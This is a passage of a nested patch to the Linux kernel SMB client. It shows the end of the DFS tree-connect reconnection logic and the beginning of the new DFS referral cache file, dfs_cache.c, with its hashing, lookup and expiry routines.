++	const struct smb_version_operations *ops = server->ops;
++	struct cifs_tcon *ipc = tcon->ses->tcon_ipc;
++	char *share = NULL, *prefix = NULL;
++	const char *tcp_host;
++	size_t tcp_host_len;
++	struct dfs_cache_tgt_iterator *tit;
++	bool target_match;
++
++	extract_unc_hostname(server->hostname, &tcp_host, &tcp_host_len);
++
++	tit = dfs_cache_get_tgt_iterator(tl);
++	if (!tit) {
++		rc = -ENOENT;
++		goto out;
++	}
++
++	/* Try to tree connect to all dfs targets */
++	for (; tit; tit = dfs_cache_get_next_tgt(tl, tit)) {
++		const char *target = dfs_cache_get_tgt_name(tit);
++		struct dfs_cache_tgt_list ntl = DFS_CACHE_TGT_LIST_INIT(ntl);
++
++		kfree(share);
++		kfree(prefix);
++		share = prefix = NULL;
++
++		/* Check if share matches with tcp ses */
++		rc = dfs_cache_get_tgt_share(server->current_fullpath + 1, tit, &share, &prefix);
++		if (rc) {
++			cifs_dbg(VFS, "%s: failed to parse target share: %d\n", __func__, rc);
++			break;
++		}
++
++		rc = target_share_matches_server(server, tcp_host, tcp_host_len, share,
++						 &target_match);
++		if (rc)
++			break;
++		if (!target_match) {
++			rc = -EHOSTUNREACH;
++			continue;
++		}
++
++		if (ipc->need_reconnect) {
++			scnprintf(tree, MAX_TREE_SIZE, "\\\\%s\\IPC$", server->hostname);
++			rc = ops->tree_connect(xid, ipc->ses, tree, ipc, cifs_sb->local_nls);
++			if (rc)
++				break;
++		}
++
++		scnprintf(tree, MAX_TREE_SIZE, "\\%s", share);
++		if (!islink) {
++			rc = ops->tree_connect(xid, tcon->ses, tree, tcon, cifs_sb->local_nls);
++			break;
++		}
++		/*
++		 * If no dfs referrals were returned from link target, then just do a TREE_CONNECT
++		 * to it.  Otherwise, cache the dfs referral and then mark current tcp ses for
++		 * reconnect so either the demultiplex thread or the echo worker will reconnect to
++		 * newly resolved target.
++		 */
++		if (dfs_cache_find(xid, tcon->ses, cifs_sb->local_nls, cifs_remap(cifs_sb), target,
++				   NULL, &ntl)) {
++			rc = ops->tree_connect(xid, tcon->ses, tree, tcon, cifs_sb->local_nls);
++			if (rc)
++				continue;
++			rc = dfs_cache_noreq_update_tgthint(server->current_fullpath + 1, tit);
++			if (!rc)
++				rc = cifs_update_super_prepath(cifs_sb, prefix);
++		} else {
++			/* Target is another dfs share */
++			rc = update_server_fullpath(server, cifs_sb, target);
++			dfs_cache_free_tgts(tl);
++
++			if (!rc) {
++				rc = -EREMOTE;
++				list_replace_init(&ntl.tl_list, &tl->tl_list);
++			} else
++				dfs_cache_free_tgts(&ntl);
++		}
++		break;
++	}
++
++out:
++	kfree(share);
++	kfree(prefix);
++
++	return rc;
++}
++
++static int tree_connect_dfs_target(const unsigned int xid, struct cifs_tcon *tcon,
++				   struct cifs_sb_info *cifs_sb, char *tree, bool islink,
++				   struct dfs_cache_tgt_list *tl)
++{
++	int rc;
++	int num_links = 0;
++	struct TCP_Server_Info *server = tcon->ses->server;
++
++	do {
++		rc = __tree_connect_dfs_target(xid, tcon, cifs_sb, tree, islink, tl);
++		if (!rc || rc != -EREMOTE)
++			break;
++	} while (rc = -ELOOP, ++num_links < MAX_NESTED_LINKS);
++	/*
++	 * If we couldn't tree connect to any targets from last referral path, then retry from
++	 * original referral path.
++	 */
++	if (rc && server->current_fullpath != server->origin_fullpath) {
++		server->current_fullpath = server->origin_fullpath;
++		cifs_signal_cifsd_for_reconnect(server, true);
++	}
++
++	dfs_cache_free_tgts(tl);
++	return rc;
++}
++
++int cifs_tree_connect(const unsigned int xid, struct cifs_tcon *tcon, const struct nls_table *nlsc)
++{
++	int rc;
++	struct TCP_Server_Info *server = tcon->ses->server;
++	const struct smb_version_operations *ops = server->ops;
++	struct super_block *sb = NULL;
++	struct cifs_sb_info *cifs_sb;
++	struct dfs_cache_tgt_list tl = DFS_CACHE_TGT_LIST_INIT(tl);
++	char *tree;
++	struct dfs_info3_param ref = {0};
++
++	/* only send once per connect */
++	spin_lock(&tcon->tc_lock);
++	if (tcon->ses->ses_status != SES_GOOD ||
++	    (tcon->status != TID_NEW &&
++	    tcon->status != TID_NEED_TCON)) {
++		spin_unlock(&tcon->tc_lock);
++		return 0;
++	}
++	tcon->status = TID_IN_TCON;
++	spin_unlock(&tcon->tc_lock);
++
++	tree = kzalloc(MAX_TREE_SIZE, GFP_KERNEL);
++	if (!tree) {
++		rc = -ENOMEM;
++		goto out;
++	}
++
++	if (tcon->ipc) {
++		scnprintf(tree, MAX_TREE_SIZE, "\\\\%s\\IPC$", server->hostname);
++		rc = ops->tree_connect(xid, tcon->ses, tree, tcon, nlsc);
++		goto out;
++	}
++
++	sb = cifs_get_tcp_super(server);
++	if (IS_ERR(sb)) {
++		rc = PTR_ERR(sb);
++		cifs_dbg(VFS, "%s: could not find superblock: %d\n", __func__, rc);
++		goto out;
++	}
++
++	cifs_sb = CIFS_SB(sb);
++
++	/* If it is not dfs or there was no cached dfs referral, then reconnect to same share */
++	if (!server->current_fullpath ||
++	    dfs_cache_noreq_find(server->current_fullpath + 1, &ref, &tl)) {
++		rc = ops->tree_connect(xid, tcon->ses, tcon->tree_name, tcon, cifs_sb->local_nls);
++		goto out;
++	}
++
++	rc = tree_connect_dfs_target(xid, tcon, cifs_sb, tree, ref.server_type == DFS_TYPE_LINK,
++				     &tl);
++	free_dfs_info_param(&ref);
++
++out:
++	kfree(tree);
++	cifs_put_tcp_super(sb);
++
++	if (rc) {
++		spin_lock(&tcon->tc_lock);
++		if (tcon->status == TID_IN_TCON)
++			tcon->status = TID_NEED_TCON;
++		spin_unlock(&tcon->tc_lock);
++	} else {
++		spin_lock(&tcon->tc_lock);
++		if (tcon->status == TID_IN_TCON)
++			tcon->status = TID_GOOD;
++		spin_unlock(&tcon->tc_lock);
++		tcon->need_reconnect = false;
++	}
++
++	return rc;
++}
++#else
++int cifs_tree_connect(const unsigned int xid, struct cifs_tcon *tcon, const struct nls_table *nlsc)
++{
++	int rc;
++	const struct smb_version_operations *ops = tcon->ses->server->ops;
++
++	/* only send once per connect */
++	spin_lock(&tcon->tc_lock);
++	if (tcon->ses->ses_status != SES_GOOD ||
++	    (tcon->status != TID_NEW &&
++	    tcon->status != TID_NEED_TCON)) {
++		spin_unlock(&tcon->tc_lock);
++		return 0;
++	}
++	tcon->status = TID_IN_TCON;
++	spin_unlock(&tcon->tc_lock);
++
++	rc = ops->tree_connect(xid, tcon->ses, tcon->tree_name, tcon, nlsc);
++	if (rc) {
++		spin_lock(&tcon->tc_lock);
++		if (tcon->status == TID_IN_TCON)
++			tcon->status = TID_NEED_TCON;
++		spin_unlock(&tcon->tc_lock);
++	} else {
++		spin_lock(&tcon->tc_lock);
++		if (tcon->status == TID_IN_TCON)
++			tcon->status = TID_GOOD;
++		tcon->need_reconnect = false;
++		spin_unlock(&tcon->tc_lock);
++	}
++
++	return rc;
++}
++#endif
+diff --git a/fs/smb/client/dfs_cache.c b/fs/smb/client/dfs_cache.c
+new file mode 100644
+index 0000000000000..3bc1d3494be3a
+--- /dev/null
++++ b/fs/smb/client/dfs_cache.c
+@@ -0,0 +1,1690 @@
++// SPDX-License-Identifier: GPL-2.0
++/*
++ * DFS referral cache routines
++ *
++ * Copyright (c) 2018-2019 Paulo Alcantara <palcantara@suse.de>
++ */
++
++#include <linux/jhash.h>
++#include <linux/ktime.h>
++#include <linux/slab.h>
++#include <linux/proc_fs.h>
++#include <linux/nls.h>
++#include <linux/workqueue.h>
++#include <linux/uuid.h>
++#include "cifsglob.h"
++#include "smb2pdu.h"
++#include "smb2proto.h"
++#include "cifsproto.h"
++#include "cifs_debug.h"
++#include "cifs_unicode.h"
++#include "smb2glob.h"
++#include "dns_resolve.h"
++
++#include "dfs_cache.h"
++
++#define CACHE_HTABLE_SIZE 32
++#define CACHE_MAX_ENTRIES 64
++#define CACHE_MIN_TTL 120 /* 2 minutes */
++
++#define IS_DFS_INTERLINK(v) (((v) & DFSREF_REFERRAL_SERVER) && !((v) & DFSREF_STORAGE_SERVER))
++
++struct cache_dfs_tgt {
++	char *name;
++	int path_consumed;
++	struct list_head list;
++};
++
++struct cache_entry {
++	struct hlist_node hlist;
++	const char *path;
++	int hdr_flags; /* RESP_GET_DFS_REFERRAL.ReferralHeaderFlags */
++	int ttl; /* DFS_REREFERRAL_V3.TimeToLive */
++	int srvtype; /* DFS_REREFERRAL_V3.ServerType */
++	int ref_flags; /* DFS_REREFERRAL_V3.ReferralEntryFlags */
++	struct timespec64 etime;
++	int path_consumed; /* RESP_GET_DFS_REFERRAL.PathConsumed */
++	int numtgts;
++	struct list_head tlist;
++	struct cache_dfs_tgt *tgthint;
++};
++
++/* List of referral server sessions per dfs mount */
++struct mount_group {
++	struct list_head list;
++	uuid_t id;
++	struct cifs_ses *sessions[CACHE_MAX_ENTRIES];
++	int num_sessions;
++	spinlock_t lock;
++	struct list_head refresh_list;
++	struct kref refcount;
++};
++
++static struct kmem_cache *cache_slab __read_mostly;
++static struct workqueue_struct *dfscache_wq __read_mostly;
++
++static int cache_ttl;
++static DEFINE_SPINLOCK(cache_ttl_lock);
++
++static struct nls_table *cache_cp;
++
++/*
++ * Number of entries in the cache
++ */
++static atomic_t cache_count;
++
++static struct hlist_head cache_htable[CACHE_HTABLE_SIZE];
++static DECLARE_RWSEM(htable_rw_lock);
++
++static LIST_HEAD(mount_group_list);
++static DEFINE_MUTEX(mount_group_list_lock);
++
++static void refresh_cache_worker(struct work_struct *work);
++
++static DECLARE_DELAYED_WORK(refresh_task, refresh_cache_worker);
++
++static void get_ipc_unc(const char *ref_path, char *ipc, size_t ipclen)
++{
++	const char *host;
++	size_t len;
++
++	extract_unc_hostname(ref_path, &host, &len);
++	scnprintf(ipc, ipclen, "\\\\%.*s\\IPC$", (int)len, host);
++}
++
++static struct cifs_ses *find_ipc_from_server_path(struct cifs_ses **ses, const char *path)
++{
++	char unc[SERVER_NAME_LENGTH + sizeof("//x/IPC$")] = {0};
++
++	get_ipc_unc(path, unc, sizeof(unc));
++	for (; *ses; ses++) {
++		if (!strcasecmp(unc, (*ses)->tcon_ipc->tree_name))
++			return *ses;
++	}
++	return ERR_PTR(-ENOENT);
++}
++
++static void __mount_group_release(struct mount_group *mg)
++{
++	int i;
++
++	for (i = 0; i < mg->num_sessions; i++)
++		cifs_put_smb_ses(mg->sessions[i]);
++	kfree(mg);
++}
++
++static void mount_group_release(struct kref *kref)
++{
++	struct mount_group *mg = container_of(kref, struct mount_group, refcount);
++
++	mutex_lock(&mount_group_list_lock);
++	list_del(&mg->list);
++	mutex_unlock(&mount_group_list_lock);
++	__mount_group_release(mg);
++}
++
++static struct mount_group *find_mount_group_locked(const uuid_t *id)
++{
++	struct mount_group *mg;
++
++	list_for_each_entry(mg, &mount_group_list, list) {
++		if (uuid_equal(&mg->id, id))
++			return mg;
++	}
++	return ERR_PTR(-ENOENT);
++}
++
++static struct mount_group *__get_mount_group_locked(const uuid_t *id)
++{
++	struct mount_group *mg;
++
++	mg = find_mount_group_locked(id);
++	if (!IS_ERR(mg))
++		return mg;
++
++	mg = kmalloc(sizeof(*mg), GFP_KERNEL);
++	if (!mg)
++		return ERR_PTR(-ENOMEM);
++	kref_init(&mg->refcount);
++	uuid_copy(&mg->id, id);
++	mg->num_sessions = 0;
++	spin_lock_init(&mg->lock);
++	list_add(&mg->list, &mount_group_list);
++	return mg;
++}
++
++static struct mount_group *get_mount_group(const uuid_t *id)
++{
++	struct mount_group *mg;
++
++	mutex_lock(&mount_group_list_lock);
++	mg = __get_mount_group_locked(id);
++	if (!IS_ERR(mg))
++		kref_get(&mg->refcount);
++	mutex_unlock(&mount_group_list_lock);
++
++	return mg;
++}
++
++static void free_mount_group_list(void)
++{
++	struct mount_group *mg, *tmp_mg;
++
++	list_for_each_entry_safe(mg, tmp_mg, &mount_group_list, list) {
++		list_del_init(&mg->list);
++		__mount_group_release(mg);
++	}
++}
++
++/**
++ * dfs_cache_canonical_path - get a canonical DFS path
++ *
++ * @path: DFS path
++ * @cp: codepage
++ * @remap: mapping type
++ *
++ * Return canonical path if success, otherwise error.
++ */
++char *dfs_cache_canonical_path(const char *path, const struct nls_table *cp, int remap)
++{
++	char *tmp;
++	int plen = 0;
++	char *npath;
++
++	if (!path || strlen(path) < 3 || (*path != '\\' && *path != '/'))
++		return ERR_PTR(-EINVAL);
++
++	if (unlikely(strcmp(cp->charset, cache_cp->charset))) {
++		tmp = (char *)cifs_strndup_to_utf16(path, strlen(path), &plen, cp, remap);
++		if (!tmp) {
++			cifs_dbg(VFS, "%s: failed to convert path to utf16\n", __func__);
++			return ERR_PTR(-EINVAL);
++		}
++
++		npath = cifs_strndup_from_utf16(tmp, plen, true, cache_cp);
++		kfree(tmp);
++
++		if (!npath) {
++			cifs_dbg(VFS, "%s: failed to convert path from utf16\n", __func__);
++			return ERR_PTR(-EINVAL);
++		}
++	} else {
++		npath = kstrdup(path, GFP_KERNEL);
++		if (!npath)
++			return ERR_PTR(-ENOMEM);
++	}
++	convert_delimiter(npath, '\\');
++	return npath;
++}
++
++static inline bool cache_entry_expired(const struct cache_entry *ce)
++{
++	struct timespec64 ts;
++
++	ktime_get_coarse_real_ts64(&ts);
++	return timespec64_compare(&ts, &ce->etime) >= 0;
++}
++
++static inline void free_tgts(struct cache_entry *ce)
++{
++	struct cache_dfs_tgt *t, *n;
++
++	list_for_each_entry_safe(t, n, &ce->tlist, list) {
++		list_del(&t->list);
++		kfree(t->name);
++		kfree(t);
++	}
++}
++
++static inline void flush_cache_ent(struct cache_entry *ce)
++{
++	hlist_del_init(&ce->hlist);
++	kfree(ce->path);
++	free_tgts(ce);
++	atomic_dec(&cache_count);
++	kmem_cache_free(cache_slab, ce);
++}
++
++static void flush_cache_ents(void)
++{
++	int i;
++
++	for (i = 0; i < CACHE_HTABLE_SIZE; i++) {
++		struct hlist_head *l = &cache_htable[i];
++		struct hlist_node *n;
++		struct cache_entry *ce;
++
++		hlist_for_each_entry_safe(ce, n, l, hlist) {
++			if (!hlist_unhashed(&ce->hlist))
++				flush_cache_ent(ce);
++		}
++	}
++}
++
++/*
++ * dfs cache /proc file
++ */
++static int dfscache_proc_show(struct seq_file *m, void *v)
++{
++	int i;
++	struct cache_entry *ce;
++	struct cache_dfs_tgt *t;
++
++	seq_puts(m, "DFS cache\n---------\n");
++
++	down_read(&htable_rw_lock);
++	for (i = 0; i < CACHE_HTABLE_SIZE; i++) {
++		struct hlist_head *l = &cache_htable[i];
++
++		hlist_for_each_entry(ce, l, hlist) {
++			if (hlist_unhashed(&ce->hlist))
++				continue;
++
++			seq_printf(m,
++				   "cache entry: path=%s,type=%s,ttl=%d,etime=%ld,hdr_flags=0x%x,ref_flags=0x%x,interlink=%s,path_consumed=%d,expired=%s\n",
++				   ce->path, ce->srvtype == DFS_TYPE_ROOT ? "root" : "link",
++				   ce->ttl, ce->etime.tv_nsec, ce->hdr_flags, ce->ref_flags,
++				   IS_DFS_INTERLINK(ce->hdr_flags) ? "yes" : "no",
++				   ce->path_consumed, cache_entry_expired(ce) ? "yes" : "no");
++
++			list_for_each_entry(t, &ce->tlist, list) {
++				seq_printf(m, "  %s%s\n",
++					   t->name,
++					   ce->tgthint == t ? " (target hint)" : "");
++			}
++		}
++	}
++	up_read(&htable_rw_lock);
++
++	return 0;
++}
++
++static ssize_t dfscache_proc_write(struct file *file, const char __user *buffer,
++				   size_t count, loff_t *ppos)
++{
++	char c;
++	int rc;
++
++	rc = get_user(c, buffer);
++	if (rc)
++		return rc;
++
++	if (c != '0')
++		return -EINVAL;
++
++	cifs_dbg(FYI, "clearing dfs cache\n");
++
++	down_write(&htable_rw_lock);
++	flush_cache_ents();
++	up_write(&htable_rw_lock);
++
++	return count;
++}
++
++static int dfscache_proc_open(struct inode *inode, struct file *file)
++{
++	return single_open(file, dfscache_proc_show, NULL);
++}
++
++const struct proc_ops dfscache_proc_ops = {
++	.proc_open	= dfscache_proc_open,
++	.proc_read	= seq_read,
++	.proc_lseek	= seq_lseek,
++	.proc_release	= single_release,
++	.proc_write	= dfscache_proc_write,
++};
++
++#ifdef CONFIG_CIFS_DEBUG2
++static inline void dump_tgts(const struct cache_entry *ce)
++{
++	struct cache_dfs_tgt *t;
++
++	cifs_dbg(FYI, "target list:\n");
++	list_for_each_entry(t, &ce->tlist, list) {
++		cifs_dbg(FYI, "  %s%s\n", t->name,
++			 ce->tgthint == t ? " (target hint)" : "");
++	}
++}
++
++static inline void dump_ce(const struct cache_entry *ce)
++{
++	cifs_dbg(FYI, "cache entry: path=%s,type=%s,ttl=%d,etime=%ld,hdr_flags=0x%x,ref_flags=0x%x,interlink=%s,path_consumed=%d,expired=%s\n",
++		 ce->path,
++		 ce->srvtype == DFS_TYPE_ROOT ? "root" : "link", ce->ttl,
++		 ce->etime.tv_nsec,
++		 ce->hdr_flags, ce->ref_flags,
++		 IS_DFS_INTERLINK(ce->hdr_flags) ? "yes" : "no",
++		 ce->path_consumed,
++		 cache_entry_expired(ce) ? "yes" : "no");
++	dump_tgts(ce);
++}
++
++static inline void dump_refs(const struct dfs_info3_param *refs, int numrefs)
++{
++	int i;
++
++	cifs_dbg(FYI, "DFS referrals returned by the server:\n");
++	for (i = 0; i < numrefs; i++) {
++		const struct dfs_info3_param *ref = &refs[i];
++
++		cifs_dbg(FYI,
++			 "\n"
++			 "flags:         0x%x\n"
++			 "path_consumed: %d\n"
++			 "server_type:   0x%x\n"
++			 "ref_flag:      0x%x\n"
++			 "path_name:     %s\n"
++			 "node_name:     %s\n"
++			 "ttl:           %d (%dm)\n",
++			 ref->flags, ref->path_consumed, ref->server_type,
++			 ref->ref_flag, ref->path_name, ref->node_name,
++			 ref->ttl, ref->ttl / 60);
++	}
++}
++#else
++#define dump_tgts(e)
++#define dump_ce(e)
++#define dump_refs(r, n)
++#endif
++
++/**
++ * dfs_cache_init - Initialize DFS referral cache.
++ *
++ * Return zero if initialized successfully, otherwise non-zero.
++ */
++int dfs_cache_init(void)
++{
++	int rc;
++	int i;
++
++	dfscache_wq = alloc_workqueue("cifs-dfscache", WQ_FREEZABLE | WQ_UNBOUND, 1);
++	if (!dfscache_wq)
++		return -ENOMEM;
++
++	cache_slab = kmem_cache_create("cifs_dfs_cache",
++				       sizeof(struct cache_entry), 0,
++				       SLAB_HWCACHE_ALIGN, NULL);
++	if (!cache_slab) {
++		rc = -ENOMEM;
++		goto out_destroy_wq;
++	}
++
++	for (i = 0; i < CACHE_HTABLE_SIZE; i++)
++		INIT_HLIST_HEAD(&cache_htable[i]);
++
++	atomic_set(&cache_count, 0);
++	cache_cp = load_nls("utf8");
++	if (!cache_cp)
++		cache_cp = load_nls_default();
++
++	cifs_dbg(FYI, "%s: initialized DFS referral cache\n", __func__);
++	return 0;
++
++out_destroy_wq:
++	destroy_workqueue(dfscache_wq);
++	return rc;
++}
++
++static int cache_entry_hash(const void *data, int size, unsigned int *hash)
++{
++	int i, clen;
++	const unsigned char *s = data;
++	wchar_t c;
++	unsigned int h = 0;
++
++	for (i = 0; i < size; i += clen) {
++		clen = cache_cp->char2uni(&s[i], size - i, &c);
++		if (unlikely(clen < 0)) {
++			cifs_dbg(VFS, "%s: can't convert char\n", __func__);
++			return clen;
++		}
++		c = cifs_toupper(c);
++		h = jhash(&c, sizeof(c), h);
++	}
++	*hash = h % CACHE_HTABLE_SIZE;
++	return 0;
++}
++
++/* Return target hint of a DFS cache entry */
++static inline char *get_tgt_name(const struct cache_entry *ce)
++{
++	struct cache_dfs_tgt *t = ce->tgthint;
++
++	return t ? t->name : ERR_PTR(-ENOENT);
++}
++
++/* Return expire time out of a new entry's TTL */
++static inline struct timespec64 get_expire_time(int ttl)
++{
++	struct timespec64 ts = {
++		.tv_sec = ttl,
++		.tv_nsec = 0,
++	};
++	struct timespec64 now;
++
++	ktime_get_coarse_real_ts64(&now);
++	return timespec64_add(now, ts);
++}
++
++/* Allocate a new DFS target */
++static struct cache_dfs_tgt *alloc_target(const char *name, int path_consumed)
++{
++	struct cache_dfs_tgt *t;
++
++	t = kmalloc(sizeof(*t), GFP_ATOMIC);
++	if (!t)
++		return ERR_PTR(-ENOMEM);
++	t->name = kstrdup(name, GFP_ATOMIC);
++	if (!t->name) {
++		kfree(t);
++		return ERR_PTR(-ENOMEM);
++	}
++	t->path_consumed = path_consumed;
++	INIT_LIST_HEAD(&t->list);
++	return t;
++}
++
++/*
++ * Copy DFS referral information to a cache entry and conditionally update
++ * target hint.
++ */
++static int copy_ref_data(const struct dfs_info3_param *refs, int numrefs,
++			 struct cache_entry *ce, const char *tgthint)
++{
++	int i;
++
++	ce->ttl = max_t(int, refs[0].ttl, CACHE_MIN_TTL);
++	ce->etime = get_expire_time(ce->ttl);
++	ce->srvtype = refs[0].server_type;
++	ce->hdr_flags = refs[0].flags;
++	ce->ref_flags = refs[0].ref_flag;
++	ce->path_consumed = refs[0].path_consumed;
++
++	for (i = 0; i < numrefs; i++) {
++		struct cache_dfs_tgt *t;
++
++		t = alloc_target(refs[i].node_name, refs[i].path_consumed);
++		if (IS_ERR(t)) {
++			free_tgts(ce);
++			return PTR_ERR(t);
++		}
++		if (tgthint && !strcasecmp(t->name, tgthint)) {
++			list_add(&t->list, &ce->tlist);
++			tgthint = NULL;
++		} else {
++			list_add_tail(&t->list, &ce->tlist);
++		}
++		ce->numtgts++;
++	}
++
++	ce->tgthint = list_first_entry_or_null(&ce->tlist,
++					       struct cache_dfs_tgt, list);
++
++	return 0;
++}
++
++/* Allocate a new cache entry */
++static struct cache_entry *alloc_cache_entry(struct dfs_info3_param *refs, int numrefs)
++{
++	struct cache_entry *ce;
++	int rc;
++
++	ce = kmem_cache_zalloc(cache_slab, GFP_KERNEL);
++	if (!ce)
++		return ERR_PTR(-ENOMEM);
++
++	ce->path = refs[0].path_name;
++	refs[0].path_name = NULL;
++
++	INIT_HLIST_NODE(&ce->hlist);
++	INIT_LIST_HEAD(&ce->tlist);
++
++	rc = copy_ref_data(refs, numrefs, ce, NULL);
++	if (rc) {
++		kfree(ce->path);
++		kmem_cache_free(cache_slab, ce);
++		ce = ERR_PTR(rc);
++	}
++	return ce;
++}
++
++static void remove_oldest_entry_locked(void)
++{
++	int i;
++	struct cache_entry *ce;
++	struct cache_entry *to_del = NULL;
++
++	WARN_ON(!rwsem_is_locked(&htable_rw_lock));
++
++	for (i = 0; i < CACHE_HTABLE_SIZE; i++) {
++		struct hlist_head *l = &cache_htable[i];
++
++		hlist_for_each_entry(ce, l, hlist) {
++			if (hlist_unhashed(&ce->hlist))
++				continue;
++			if (!to_del || timespec64_compare(&ce->etime,
++							  &to_del->etime) < 0)
++				to_del = ce;
++		}
++	}
++
++	if (!to_del) {
++		cifs_dbg(FYI, "%s: no entry to remove\n", __func__);
++		return;
++	}
++
++	cifs_dbg(FYI, "%s: removing entry\n", __func__);
++	dump_ce(to_del);
++	flush_cache_ent(to_del);
++}
++
++/* Add a new DFS cache entry */
++static int add_cache_entry_locked(struct dfs_info3_param *refs, int numrefs)
++{
++	int rc;
++	struct cache_entry *ce;
++	unsigned int hash;
++
++	WARN_ON(!rwsem_is_locked(&htable_rw_lock));
++
++	if (atomic_read(&cache_count) >= CACHE_MAX_ENTRIES) {
++		cifs_dbg(FYI, "%s: reached max cache size (%d)\n", __func__, CACHE_MAX_ENTRIES);
++		remove_oldest_entry_locked();
++	}
++
++	rc = cache_entry_hash(refs[0].path_name, strlen(refs[0].path_name), &hash);
++	if (rc)
++		return rc;
++
++	ce = alloc_cache_entry(refs, numrefs);
++	if (IS_ERR(ce))
++		return PTR_ERR(ce);
++
++	spin_lock(&cache_ttl_lock);
++	if (!cache_ttl) {
++		cache_ttl = ce->ttl;
++		queue_delayed_work(dfscache_wq, &refresh_task, cache_ttl * HZ);
++	} else {
++		cache_ttl = min_t(int, cache_ttl, ce->ttl);
++		mod_delayed_work(dfscache_wq, &refresh_task, cache_ttl * HZ);
++	}
++	spin_unlock(&cache_ttl_lock);
++
++	hlist_add_head(&ce->hlist, &cache_htable[hash]);
++	dump_ce(ce);
++
++	atomic_inc(&cache_count);
++
++	return 0;
++}
++
++/* Check if two DFS paths are equal.  @s1 and @s2 are expected to be in @cache_cp's charset */
++static bool dfs_path_equal(const char *s1, int len1, const char *s2, int len2)
++{
++	int i, l1, l2;
++	wchar_t c1, c2;
++
++	if (len1 != len2)
++		return false;
++
++	for (i = 0; i < len1; i += l1) {
++		l1 = cache_cp->char2uni(&s1[i], len1 - i, &c1);
++		l2 = cache_cp->char2uni(&s2[i], len2 - i, &c2);
++		if (unlikely(l1 < 0 && l2 < 0)) {
++			if (s1[i] != s2[i])
++				return false;
++			l1 = 1;
++			continue;
++		}
++		if (l1 != l2)
++			return false;
++		if (cifs_toupper(c1) != cifs_toupper(c2))
++			return false;
++	}
++	return true;
++}
++
++static struct cache_entry *__lookup_cache_entry(const char *path, unsigned int hash, int len)
++{
++	struct cache_entry *ce;
++
++	hlist_for_each_entry(ce, &cache_htable[hash], hlist) {
++		if (dfs_path_equal(ce->path, strlen(ce->path), path, len)) {
++			dump_ce(ce);
++			return ce;
++		}
++	}
++	return ERR_PTR(-ENOENT);
++}
++
++/*
++ * Find a DFS cache entry in hash table and optionally check prefix path against normalized @path.
++ *
++ * Use whole path components in the match.  Must be called with htable_rw_lock held.
++ *
++ * Return ERR_PTR(-ENOENT) if the entry is not found.
++ */
++static struct cache_entry *lookup_cache_entry(const char *path)
++{
++	struct cache_entry *ce;
++	int cnt = 0;
++	const char *s = path, *e;
++	char sep = *s;
++	unsigned int hash;
++	int rc;
++
++	while ((s = strchr(s, sep)) && ++cnt < 3)
++		s++;
++
++	if (cnt < 3) {
++		rc = cache_entry_hash(path, strlen(path), &hash);
++		if (rc)
++			return ERR_PTR(rc);
++		return __lookup_cache_entry(path, hash, strlen(path));
++	}
++	/*
++	 * Handle paths that have more than two path components and are a complete prefix of the DFS
++	 * referral request path (@path).
++	 *
++	 * See MS-DFSC 3.2.5.5 "Receiving a Root Referral Request or Link Referral Request".
++	 */
++	e = path + strlen(path) - 1;
++	while (e > s) {
++		int len;
++
++		/* skip separators */
++		while (e > s && *e == sep)
++			e--;
++		if (e == s)
++			break;
++
++		len = e + 1 - path;
++		rc = cache_entry_hash(path, len, &hash);
++		if (rc)
++			return ERR_PTR(rc);
++		ce = __lookup_cache_entry(path, hash, len);
++		if (!IS_ERR(ce))
++			return ce;
++
++		/* backward until separator */
++		while (e > s && *e != sep)
++			e--;
++	}
++	return ERR_PTR(-ENOENT);
++}
++
++/**
++ * dfs_cache_destroy - destroy DFS referral cache
++ */
++void dfs_cache_destroy(void)
++{
++	cancel_delayed_work_sync(&refresh_task);
++	unload_nls(cache_cp);
++	free_mount_group_list();
++	flush_cache_ents();
++	kmem_cache_destroy(cache_slab);
++	destroy_workqueue(dfscache_wq);
++
++	cifs_dbg(FYI, "%s: destroyed DFS referral cache\n", __func__);
++}
++
++/* Update a cache entry with the new referral in @refs */
++static int update_cache_entry_locked(struct cache_entry *ce, const struct dfs_info3_param *refs,
++				     int numrefs)
++{
++	int rc;
++	char *s, *th = NULL;
++
++	WARN_ON(!rwsem_is_locked(&htable_rw_lock));
++
++	if (ce->tgthint) {
++		s = ce->tgthint->name;
++		th = kstrdup(s, GFP_ATOMIC);
++		if (!th)
++			return -ENOMEM;
++	}
++
++	free_tgts(ce);
++	ce->numtgts = 0;
++
++	rc = copy_ref_data(refs, numrefs, ce, th);
++
++	kfree(th);
++
++	return rc;
++}
++
++static int get_dfs_referral(const unsigned int xid, struct cifs_ses *ses, const char *path,
++			    struct dfs_info3_param **refs, int *numrefs)
++{
++	int rc;
++	int i;
++
++	cifs_dbg(FYI, "%s: get an DFS referral for %s\n", __func__, path);
++
++	*refs = NULL;
++	*numrefs = 0;
++
++	if (!ses || !ses->server || !ses->server->ops->get_dfs_refer)
++		return -EOPNOTSUPP;
++	if (unlikely(!cache_cp))
++		return -EINVAL;
++
++	rc =  ses->server->ops->get_dfs_refer(xid, ses, path, refs, numrefs, cache_cp,
++					      NO_MAP_UNI_RSVD);
++	if (!rc) {
++		struct dfs_info3_param *ref = *refs;
++
++		for (i = 0; i < *numrefs; i++)
++			convert_delimiter(ref[i].path_name, '\\');
++	}
++	return rc;
++}
++
++/*
++ * Find, create or update a DFS cache entry.
++ *
++ * If the entry wasn't found, it will create a new one. Or if it was found but
++ * expired, then it will update the entry accordingly.
++ *
++ * For interlinks, cifs_mount() and expand_dfs_referral() are supposed to
++ * handle them properly.
++ */
++static int cache_refresh_path(const unsigned int xid, struct cifs_ses *ses, const char *path)
++{
++	struct dfs_info3_param *refs = NULL;
++	struct cache_entry *ce;
++	int numrefs = 0;
++	int rc;
++
++	cifs_dbg(FYI, "%s: search path: %s\n", __func__, path);
++
++	down_read(&htable_rw_lock);
++
++	ce = lookup_cache_entry(path);
++	if (!IS_ERR(ce) && !cache_entry_expired(ce)) {
++		up_read(&htable_rw_lock);
++		return 0;
++	}
++	/*
++	 * Unlock shared access as we don't want to hold any locks while getting
++	 * a new referral.  The @ses used for performing the I/O could be
++	 * reconnecting and it acquires @htable_rw_lock to look up the dfs cache
++	 * in order to failover -- if necessary.
++	 */
++	up_read(&htable_rw_lock);
++
++	/*
++	 * Either the entry was not found, or it is expired.
++	 * Request a new DFS referral in order to create or update a cache entry.
++	 */
++	rc = get_dfs_referral(xid, ses, path, &refs, &numrefs);
++	if (rc)
++		goto out;
++
++	dump_refs(refs, numrefs);
++
++	down_write(&htable_rw_lock);
++	/* Re-check as another task might have it added or refreshed already */
++	ce = lookup_cache_entry(path);
++	if (!IS_ERR(ce)) {
++		if (cache_entry_expired(ce))
++			rc = update_cache_entry_locked(ce, refs, numrefs);
++	} else {
++		rc = add_cache_entry_locked(refs, numrefs);
